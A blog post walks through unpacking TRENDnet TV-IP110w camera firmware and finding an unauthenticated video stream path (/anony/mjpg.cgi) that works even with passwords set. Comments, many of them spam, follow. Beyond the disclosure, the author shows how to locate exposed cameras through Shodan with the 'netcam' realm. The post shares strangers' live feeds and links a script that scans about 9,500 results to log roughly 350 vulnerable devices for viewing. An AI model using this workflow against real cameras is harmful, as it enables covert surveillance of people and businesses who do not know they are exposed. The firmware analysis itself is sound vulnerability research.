Now that we got that out of the way... I have been seeing posts on sites with people having fun with embedded systems/devices and I was feeling left out. I didn't really want to go out and buy a device so I looked at what was laying around.
Enter the Trendnet TV-IP110w - http://www.trendnet.com/products/proddetail.asp?prod=145_TV-IP110W
To start off the latest firmware for this device can be found at the following location :
First order of business was to update the camera with the most recent firmware:
![]() |
Device info page confirming firmware version |
Now that the device was using the same version of firmware as I was going to dive into, lets get to work. I will be using binwalk to fingerprint file headers that exist inside the firmware file. Binwalk can be downloaded from the following url: http://code.google.com/p/binwalk/
Running binwalk against the firmware file
binwalk FW_TV-IP110W_1.1.0-104_20110325_r1006.pck
DECIMAL HEX DESCRIPTION
-------------------------------------------------------------------------------------------------------
32320 0x7E40 gzip compressed data, from Unix, last modified: Thu Mar 24 22:59:08 2011, max compression
679136 0xA5CE0 gzip compressed data, was "rootfs", from Unix, last modified: Thu Mar 24 22:59:09 2011, max compression
Looks like there are two gzip files in the "pck" file. Lets carve them out using 'dd'. First cut the head off the file and save it off as '1_unk'
#dd if=FW_TV-IP110W_1.1.0-104_20110325_r1006.pck of=1_unk bs=1 count=32320
32320+0 records in
32320+0 records out
32320 bytes (32 kB) copied, 0.167867 s, 193 kB/s
Next cut out the first gzip file that was identified, we will call this file '2'
#dd if=FW_TV-IP110W_1.1.0-104_20110325_r1006.pck of=2 bs=1 skip=32320 count=646816
646816+0 records in
646816+0 records out
646816 bytes (647 kB) copied, 2.87656 s, 225 kB/s
Finally cut the last part of the file out that was identified as being a gzip file, call this file '3'
#dd if=FW_TV-IP110W_1.1.0-104_20110325_r1006.pck of=3 bs=1 skip=679136
2008256+0 records in
2008256+0 records out
2008256 bytes (2.0 MB) copied, 8.84203 s, 227 kB/s
For this post I am going to ignore files '1_unk' and '2' and just concentrate on file '3' as it contains an interesting bug :) Make a copy of the file '3' and extract it using gunzip
#file 3
3: gzip compressed data, was "rootfs", from Unix, last modified: Thu Mar 24 22:59:09 2011, max compression
#cp 3 3z.gz
#gunzip 3z.gz
gzip: 3z.gz: decompression OK, trailing garbage ignored
#file 3z
3z: Minix filesystem, 30 char names
As we can see the file '3' was a compressed Minix file system. Lets mount it and take a look around.
#mkdir cameraFS
#sudo mount -o loop -t minix 3z cameraFS/
#cd cameraFS/
#ls
bin dev etc lib linuxrc mnt proc sbin server tmp usr var
There is all sorts of interesting stuff in the "/server" directory but we are going to zero in on a specific directory "/server/cgi-bin/anony/"
#cd server/cgi-bin/anony/
#ls
jpgview.htm mjpeg.cgi mjpg.cgi view2.cgi
The "cgi-bin" directory is mapped to the root directory of http server of the camera, knowing this we can make a request to http://192.168.1.17/anony/mjpg.cgi and surprisingly we get a live stream from the camera.
video stream. giving no fucks. |
Now at first I am thinking, well the directory is named "anony" that means anonymous so this must be something that is enabled in the settings that we can disable.... Looking at the configuration screen you can see where users can be configured to access the camera. The following screen shows the users I have configured (user, guest)
Users configured with passwords. |
Still after setting up users with passwords the camera is more than happy to let me view its video stream by making our previous request. There does not appear to be a way to disable access to the video stream, I can't really believe this is something that is intended by the manufacturer. Lets see who is out there :)
Because the web server requires authentication to access it (normally) we can use this information to fingerprint the camera easily. We can use the realm of 'netcam' to conduct our searches
HTTP Auth with 'netcam' realm |
Hopping on over to Shodan (http://www.shodanhq.com) we can search for 'netcam' and see if there is anyone out there for us to watch
9,500 results |
If we check a few we can see this is limited to only those results with the realm of 'netcam' and not 'Netcam'
creepy hole in the wall |
front doors to some business |
Doing this manually is boring and tedious, wouldn't it be great if we could automagically walk through all 9,500 results and log the 'good' hosts.... http://consolecowboys.org/scripts/camscan.py
This python script requires the shodan api libs http://docs.shodanhq.com/ and an API key. It will crawl the shodan results and check if the device is vulnerable and log it. The only caveat here is that the shodan api.py file needs to be edited to allow for including result page offsets. I have highlighted the required changes below.
def search(self, query,page=1):
"""Search the SHODAN database.
Arguments:
query -- search query; identical syntax to the website
page -- page number of results
Returns:
A dictionary with 3 main items: matches, countries and total.
Visit the website for more detailed information.
"""
return self._request('search', {'q': query,'page':page})
Last I ran this there was something like 350 vulnerable devices that were available via shodan. Enjoy.
Update: We are in no way associated with the @TRENDnetExposed twitter account.
Update: We are in no way associated with the @TRENDnetExposed twitter account.
http://www.geenstijl.nl/.
ReplyDeleteHolland's mosty favorite website has a topic on these webcams and even a link to this blog!.
That'll generate a bunch of visitors today for ya!All da best in 2012 for ya,kski from:www.koenski-beterweter.blogspot.com.
geenstijl !
ReplyDeleteNice job :-)
ReplyDeleteAnyone have any idea which Trendnet cameras are effected by this? Clearly the ip110w is, but some of the cameras I've seen that are vulnerable have night vision and I know the ip110 and ip110w do not have night vision. Just wondering which ones this will work with.
ReplyDeleteIt looks like the following cameras are vulnerable:
ReplyDeleteTV-IP110W
TV-IP110WN
TV-IP121WN
TV-IP410
DISCONTINUED PRODUCT
ReplyDeleteThe TV-IP110W (Version A1.0R) has been discontinued. It has been replaced by the TV-IP110WN (Version v1.0R). For a list of discontinued products, click here.
From page of TRENDnet:(!
So they stopped to produce them:(!
ALL the netcams from Trendnet are vulnerable (and I suspect a slew of other from different manufacturers).
ReplyDeleteI have one that isn't listed here and it is vulnerable to the auth bypass.
I have contacted their customer support (and I suggest you do the same) but they aren't really proactive in solving the issue with a firmware upgrade.
If only we could just flash the original firmware with OpenWRT or something different that would give us full control on the camera features...
It is starting to look like all trendnet cameras are vulnerable, they have updated their downloads page with critical updates that "improve security" for the following cameras:
ReplyDeleteTV-IP121W
TV-IP252P
TV-IP410WN
TV-IP410
TV-IP121WN
TV-IP110WN
TV-IP110W
That is 7/11 of the cameras they make.
great job on this.
ReplyDeleteand yet another example of the typical thiking of nowadays companies. fuck scurity, nobody cares as long as nobody knows.
This comment has been removed by the author.
ReplyDelete7 feb 9:00 (+1 gmt)
ReplyDeletehttp://www.shodanhq.com/ -->
Undergoing maintenance, please stand by.
TRENDnet just do a firmware update : http://www.trendnet.com/downloads/
ReplyDeleteWhats about the cams from Vialar? I saw some with the search for Ipcam. The Interface seems to be very week, may they have the same prob like trendnet.
ReplyDeleteunbelievable!!
ReplyDeletegeez treadnet!
u guyz are gonna make a hacker out of me! :O :P ;)
We have done the cover of the national newspaper in Buenos Aires about this issue http://translate.google.com/translate?sl=es&tl=en&js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&u=http%3A%2F%2Fwww.pagina12.com.ar%2Fdiario%2Fcdigital%2F31-188001-2012-02-21.html
ReplyDeleteHello someLuser,
ReplyDeleteit was very interresting you found out with the firmware. We have tested it on several other IPcameras but got no access. We would like to hire you for testing the firmware of one of our new products.
If you do have interrests please call me at:
+49 2131 36685676
HMay
hi I've got the script running but after about 30 seconds i get this error"shodan.api.WebAPIError: Too many results requested, not enough credits"
ReplyDeleteYou need to pay for the unrestricted api calls in order to view more results http://www.shodanhq.com/anniversary
DeleteThanks. I upgraded to the 1.1.1.105 firmware and the issue is gone.
ReplyDeleteUnfortunately, so is the 1.1.0.104 firmware from your download link (Trendnet website). Could you provide a link to it? Reason: I run binwalk on 105, cut with dd, and mounted the minix fs. Bytecounts are exactly the same as for 104! The anon dir is still there - it just needs a password now. I would love to run a diff and see what they changed.
This should be correct - http://consolecowboys.org/fw_tv-ip110w_a1.x(1.1.0.104).zip
DeleteThat link is dead also. Can someone please share if they have the vulnerable firmware 1.1.0.104.
Deletecan someone give me a summary on how to use the script, im new to codes. Am I suppose to open the script with notepad? and save it as htm? because with binwalk, shodan documentary are all scripts and how am i suppose to use them
ReplyDeleteor at least just give me the full link with everything wthout me have to create my own script
Deletedoes it work on Macintosh?
ReplyDeleteI am very enjoyed for this blog. I feel strongly about it and love learning more on this topic. If possible, as you gain expertise, would you mind updating your blog with more information? It is extremely helpful for me
ReplyDeleteAlarm Monitoring
this web ip cameras site is amazingly helpful considering we've cctv camcorder, it will be web log good and allow de data concerning this cctv camcorder.
ReplyDeleteShouldn't it be possible to alert some of these people that are victims of this flaw? Possibly through their ISP via a whois lookup? It makes me sick that these people have no idea this is happening.
ReplyDeleteIt's Cool! I hope my home hit :D
ReplyDeleteCCTV is big equipment to record video. It is always use to identify criminals, with the record of CCTV we make decision easily. It is really helpful.
ReplyDeletecctv camera in ludhiana || security systems in ludhiana
Great creation. thank you for sharing this knowledge
ReplyDeletewww.visec.net/index.php Watch your Home or office,Video Surveillance,Web cam surveillance, Live video of your home, protect family, surveillance software
Great and informative information you have shared, which is knowledgeable. Thank for sharing. Keep me more updates WorldEyeCam
ReplyDeleteI was searching about this issue as you have discussed very clearly and lovely manner that I don’t have to go now any other webpage. home security companies
ReplyDeleteIt’s amazing in support of me to truly have a web site that is valuable meant for my knowledge.Click To Aware
ReplyDeleteThanks for compiling such nicest information in your blogs. Articles are very informative and hope again I’ll find more like that. Kraig Woongoed
ReplyDeleteI read your blog such a helpful to me……
ReplyDeleteThank you for posting…..!!!
Security Cameras and security mirrors
Creepy hole in the wall is really creepy. Thanks for the blog article
ReplyDeleteI'm also visiting this site regularly, this web site is really nice and the users are genuinely sharing good thoughts.
ReplyDeletehome auto insurance bundle
Thankfulness to my dad who informed me relating to this blog, this website is really amazing.
ReplyDeleteAlex
Great and respectable post. I discovered this much instructive, with reference to what I was decisively searching for. An obligation of appreciation is all together for such post and please keep giving to us. wireless cctv camera price in pakistan
ReplyDeleteWow i can say that this is another great article as expected of this blog.Bookmarked this site.. online camera test
ReplyDeleteWow excellent post..! thanks for sharing about cctv camera keep posting...
ReplyDeleteGood post.
ReplyDeleteThis post is very useful. Thnks for sharing it.
ReplyDeleteCCTV Camera Dealers | Fire Hydrant Dealers in India
Well we are here to get rid of that perception. You don’t have to have a thousand dollar budget to get a good camera.
ReplyDeletebest photography cameras
best travel camera
best pocket camera
photography camera
best cameras for photography
best digital cameras
best tripod
best camera for travel
good cameras for photography
mirrorless camera reviews
best travel tripod
best digital camera under $200
best cheap camera
good photography cameras
best camera under $200
best point and shoot camera under 200
cheap dslr
best tripods
best point and shoot digital camera
best cheap digital camera
best point and shoot camera under 300
Hi admin, it is very nice blog, very informative blog so thank you so much for this information. But there is another website with same concept of free ad posting www.helpadya.com www.helpadya.com Classified Free Ads.
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteHey! Where can i get the python script that was used for automation of this hack? I am a student and I need it for research purpose.
ReplyDeleteThanks
I concur with blogger that Trendnet cameras have very unique features and quality. In fact, these are one of the best specifications for the camera of such use. I hope that the readers would be planning to make their order Medical School Admission Essay Reviewing
ReplyDeleteThe satta matka Original Website Provide Fast Matka Result site.
ReplyDeleteAwesome,
ReplyDeleteThank you so much for sharing such an awesome blog...
boom barriers
boom barriers in hyderabad
boom barriers in mumbai
boom barriers in delhi
Super blog and very interesting information which I always wanted to search many article but you article is really fantastic.
ReplyDeleteWi-Fi camera
ReplyDeleteشرکت هوشمند افزار آسیا یکی از قدرتمند ترین شرکت های حوزه سیستم های امنیتی و نظارت تصویری و دوربین های مداربسته
نماینده فروش دوربین های مداربسته هایک ویژن در کرج و تهران
نصب دوربین مداربسته
نماینده فروش دوربین های مداربسته هایک ویژن در کرج و تهران
نماینده فروش دوربین های مداربسته هایک ویژن در کرج و تهران
مجله تخصصی دوربین مداربسته و سیستم های حفاظتی و امنیتی
02634216001-02634216002
Are you having problem's with your Netgear Arlo Camera and want to speak with one of the Arlo Customer Service agent? Nothing to worry simply call Arlo camera support number 0800-973-2044 and get instant solution.
ReplyDeleteThank you for your post. This is excellent information. It is amazing and wonderful to visit your site.
ReplyDeleteBoom Barriers
Home Theatre Systems, Inc. Being a well known company, we have vast experience to serve office, house and commercial property. Smarter Home Alarms
ReplyDeleteHi, thanks for your article on treadnet cameras but if someone is looking to buy the best cameras for photography then I have a better suggestion for photography lovers. Whether you are looking to buy a camera for nature or animal photography, you will surely find this list of best digital cameras under $300 very helpful for you in the long run. I'm sure that you will find the right one.
ReplyDeleteEven without apps, people use their cellphones to increase their safety by telling a friend where they are going and asking for a call if they have not checked in by an agreed time. These individual uses of information technology are informal information systSmarter Security Melbourne
ReplyDeleteems and are also important features of a Smart City.
Thanks for this wonderful and informative article. I found it very helpful for those who are looking to know to know about cameras. Well, if you are looking to buy a camera for your photography needs then it is recommended to take a look at this list of cameras under $300.You will surely find the best one for your needs on this link.
ReplyDeleteUnsecured Wi-Fi networks make it easy for hackers to access Wi-Fi cameras. A single flaw is enough to allow hackers to infiltrate and tamper with the surveillance system. Smarter Security Melbourne
ReplyDeleteAwesome,
ReplyDeleteThank you so much for sharing such an awesome blog...
boom barriers
boom barriers in hyderabad
electromagnetic locks suppliers
electromagnetic locks manufacturers
I have been reading your posts regularly which is specially for survival gear .I need to say that you are doing a fantastic work. Please keep it up the great work.
ReplyDeletesurvival gear
Useful Information, your blog is sharing unique information....
ReplyDeleteThanks for sharing!!!
tripod turnstile manufacturers in hyderabad
tripod turnstile suppliers in hyderabad
drop arm turnstiles
boom barriers
flap barriers
Very Nice blog...
ReplyDeleteboom barriers
rising bollards in mumbai
Solar power fence in mumbai
electromagnetic locks manufacturers in mumbai
automatic bollards in mumbai
hydraulic road blockers in delhi
tyre killers in delhi
This site was... how do I say it? Relevant!! Finally I have found something that helped me. Cheers!
ReplyDeletehttp://editorsviews.com/best-scanners-2018/
I like the way WebPromotion 2006 - 2007 is presented, so concise. http://downloadsoftwarefromanna.download -Enjoying your exciting moments,sharing with your friends.
ReplyDeleteI was really want to get some more detail and information about the alarms but your blog helped me so much thank you for sharing it.
ReplyDeleteburglar alarms
Really very interesting and very valuable information about the camera and security well done.
ReplyDeletede télésurveillance
Very interesting and informative blog and about the alarm security and I must appreciate your work well done keep it up.
ReplyDeletede télésurveillance
I was really want to get some more detail and information about the Alarm Response but your blog helped me so much thank you for sharing it.
ReplyDeleteAlarm Response
Thanks for posting the useful information to my vision. This is excellent information,.
ReplyDeletetripod turnstiles in mumbai #Solar power fence in mumbai #flap barriers in mumbai
#electromagnetic locks manufacturers in mumbai
Thanks for posting the useful information to my vision. This is excellent information,.
ReplyDeleteboom barriers
Thanks for posting the useful information to my vision. This is excellent information,.
ReplyDeleteboom barriers
This information is very useful. thank you for sharing. and I will also share information about health through the website
ReplyDeleteCara Mengobati radang Usus
Cara Mengatasi sakit pundak dan Leher kaku
Cara Menghilangkan Benjolan di Bibir
Obat Nyeri haid
Tips Menghilangkan Wajah kusam
Cara Mengobati Bisul
solusi masalah kewanitaan
Thanks for posting the useful information to my vision. This is excellent information,.
ReplyDeleteboom barriers
Thanks for posting the useful information to my vision. This is excellent information,.
ReplyDeleteelectric door strikes